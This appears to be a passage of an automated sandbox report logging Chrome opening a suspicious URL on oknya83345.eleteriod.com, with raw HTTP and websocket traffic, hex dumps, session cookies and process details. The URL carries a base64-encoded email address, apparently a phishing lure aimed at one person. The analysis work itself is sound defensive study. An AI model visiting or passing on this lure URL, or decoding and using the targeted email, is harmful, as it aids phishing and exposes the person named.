                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zPJaEPJNSdKjbMKrJyLG3i2cNMoVf2JuXi6k6QIRB3W1%2FFK0tggvgtMaxzqURhdT3Vxq45tGjg4rnGTapv950CaW%2BCyFkNkxm3mG30uuEdW9ozT0sny2egzspWqW7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e0098da8219cf-EWR
                          2024-05-22 15:57:31 UTC706INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 8e 00 00 03 83 08 06 00 00 00 11 c6 07 ce 00 00 20 00 49 44 41 54 78 01 ec dd cf 71 e3 c6 b6 07 e0 09 c1 21 38 04 6f 6e 95 97 13 c2 ac df 7b 0b 87 a0 12 34 7b ef ef 7b 55 0a 41 21 78 e7 ed 84 a0 10 74 33 50 06 7e d5 53 38 36 0d 13 10 4e 13 7f 1a e0 37 55 53 4d 89 0d 10 f8 70 9a 22 1b 3f 82 9f 3e f9 47 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                          Data Ascii: PNGIHDR IDATxq!8on{4{{UA!xt3P~S86N7USMp"?>G @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:31 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:31 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:31 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:31 UTC1369INData Raw: 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:31 UTC1369INData Raw: 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:31 UTC1369INData Raw: 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:31 UTC79INData Raw: 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                          Data Ascii: @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:31 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                          2024-05-22 15:57:31 UTC1369INData Raw: 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08
                          Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          65192.168.2.449813188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:43 UTC1301OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: Upgrade
                          Pragma: no-cache
                          Cache-Control: no-cache
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Upgrade: websocket
                          Origin: https://oknya83345.eleteriod.com
                          Sec-WebSocket-Version: 13
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
                          Sec-WebSocket-Key: BDBIQpxrM/238w6jZTkiyg==
                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                          2024-05-22 15:57:44 UTC587INHTTP/1.1 400 Bad Request
                          Date: Wed, 22 May 2024 15:57:44 GMT
                          Content-Type: application/json
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GmgIZsR2LU60DgznoMELsNzAB%2FfX8wg5cvvo%2F9lIbzRoPqEHHaZWyvYIz3V8L2b7v9Raz4OVtzzNWO8DtJ8Ee8jObBGK07tyoUH92Qf0i14uxHEnyC%2B8TBjKGJdX3HRh3y2qu3cVTT5nkWQ%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 887e00ec3ad842a9-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:57:44 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                          Data Ascii: 22{"code":3,"message":"Bad request"}
                          2024-05-22 15:57:44 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          66192.168.2.44981635.190.80.14435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:54 UTC541OUTOPTIONS /report/v4?s=zPJaEPJNSdKjbMKrJyLG3i2cNMoVf2JuXi6k6QIRB3W1%2FFK0tggvgtMaxzqURhdT3Vxq45tGjg4rnGTapv950CaW%2BCyFkNkxm3mG30uuEdW9ozT0sny2egzspWqW7A%3D%3D HTTP/1.1
                          Host: a.nel.cloudflare.com
                          Connection: keep-alive
                          Origin: https://oknya83345.eleteriod.com
                          Access-Control-Request-Method: POST
                          Access-Control-Request-Headers: content-type
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:57:55 UTC336INHTTP/1.1 200 OK
                          content-length: 0
                          access-control-max-age: 86400
                          access-control-allow-methods: POST, OPTIONS
                          access-control-allow-origin: *
                          access-control-allow-headers: content-type, content-length
                          date: Wed, 22 May 2024 15:57:55 GMT
                          Via: 1.1 google
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          67192.168.2.44981735.190.80.14435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:55 UTC474OUTPOST /report/v4?s=zPJaEPJNSdKjbMKrJyLG3i2cNMoVf2JuXi6k6QIRB3W1%2FFK0tggvgtMaxzqURhdT3Vxq45tGjg4rnGTapv950CaW%2BCyFkNkxm3mG30uuEdW9ozT0sny2egzspWqW7A%3D%3D HTTP/1.1
                          Host: a.nel.cloudflare.com
                          Connection: keep-alive
                          Content-Length: 870
                          Content-Type: application/reports+json
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:57:55 UTC870OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 36 34 33 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 30 38 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6f 6b 6e 79 61 38 33 33 34 35 2e 65
                          Data Ascii: [{"age":36436,"body":{"elapsed_time":2089,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":404,"type":"http.error"},"type":"network-error","url":"https://oknya83345.e
                          2024-05-22 15:57:55 UTC168INHTTP/1.1 200 OK
                          content-length: 0
                          date: Wed, 22 May 2024 15:57:55 GMT
                          Via: 1.1 google
                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                          Connection: close


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          68192.168.2.449818188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:58:02 UTC1301OUTGET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: Upgrade
                          Pragma: no-cache
                          Cache-Control: no-cache
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Upgrade: websocket
                          Origin: https://oknya83345.eleteriod.com
                          Sec-WebSocket-Version: 13
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IllTY2k4cnA4WGw5TVE0eXdOekVYRUE9PSIsInZhbHVlIjoiMGQ3R0FneWM4WGhWVHZQNGNGays4VzRZQ2l3eXFtQU5tOEttSEk3NDQ5emUwU3dYNzlIZVNJbFYybHVZdDNqV0tKOEorSHVhdytROGk2aWcyb1dTdUYydnR5SVRLNzlkSkR6UVZoVHBwbHExREp4ZjQvSGZLUk5oRDVIVXV0UzciLCJtYWMiOiI5NmE5NWU4NTg4MGE4OWQ1NDdlMjlkNTI1MTZkN2IxM2U1MmRiMzJmNjkxOWExZWU3NDk0MWE0YjNmMTI0ODk2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IldyMTN5TFo0VXRvQmNkMkJRWFo0Tnc9PSIsInZhbHVlIjoiNUhZNVNkVjU1TDZpQjlDL1VkR3hJaFIwaDc4TGpkL1NVRU5Ub1Q5VW5UYStudDRBTTdIYnRLbkliOUpJUUV1czl1MUQzVnBwaXlCSlVxWkYybEU4Mkg3NXF3Z21nRUtzbU5VaGlwNEhlcXQ1VFBTOVFrTm9ySi9CTDRGcG9yQmciLCJtYWMiOiJmYjUzZjk5MzBlODdmNDI1MDliNDY5NWE2ZTJkNmE1OWFhN2M5ZjRkYjcyODRlMTk4ODkyMjdiYjY4YTljYWZjIiwidGFnIjoiIn0%3D
                          Sec-WebSocket-Key: Icg4jNYwaKCrdvuSJ4/omA==
                          Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                          2024-05-22 15:58:03 UTC585INHTTP/1.1 400 Bad Request
                          Date: Wed, 22 May 2024 15:58:03 GMT
                          Content-Type: application/json
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2VSebHId7bwLV7EBr2zxbIEqlmUOyHAYea6B7rIqxO87XVLt6u2tP44qBZrSa3BjAmmN4jnSxFaHXgYmWp5JtreYY7vdyMvJTXtIVnAU8z8iNqqkMs2C8FXJPJztAQ%2FxU%2BL9ddYVizu2Eho%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 887e0160af627d1c-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:58:03 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                          Data Ascii: 22{"code":3,"message":"Bad request"}
                          2024-05-22 15:58:03 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Click to jump to process

                          Click to jump to process

                          Click to jump to process

                          Target ID:0
                          Start time:11:56:38
                          Start date:22/05/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                          Imagebase:0x7ff76e190000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:2
                          Start time:11:56:41
                          Start date:22/05/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1876,i,16849530955463525120,13524078821275849099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                          Imagebase:0x7ff76e190000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:false

                          Target ID:3
                          Start time:11:56:44
                          Start date:22/05/2024
                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://oknya83345.eleteriod.com/infd201971/#YWhlaW5tYWFAY2lkZWwuY29t"
                          Imagebase:0x7ff76e190000
                          File size:3'242'272 bytes
                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          No disassembly